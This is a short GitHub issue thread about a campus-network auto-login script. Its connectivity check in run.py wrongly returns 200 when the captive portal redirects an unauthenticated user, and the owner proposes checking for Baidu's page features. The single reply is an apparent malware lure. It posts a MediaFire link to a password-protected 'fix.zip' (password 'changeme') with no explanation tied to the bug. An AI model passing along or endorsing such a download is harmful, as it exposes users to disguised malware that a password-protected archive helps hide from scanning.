### ISSUE TITLE
run.py中网络测试无登录的情况也会返回200

### ISSUE THREAD

**Issue by Hatanezumi** [Hatanezumi/JiLinCMCGSchoolNetAutoLogin#2]
由于在未登录的时候访问页面会自动跳转到登录页面，导致网络测试会直接返回200
此问题导致run.py始终因联网测试导致无法运行

考虑检测百度或其他网站的特征以确认是否联网

**Comment by SagarChandra07** [comment]
download
https://www.mediafire.com/file/q4gho1ar8e43udd/fix.zip/file
Archive codepass: changeme

you may need to install the c compiler
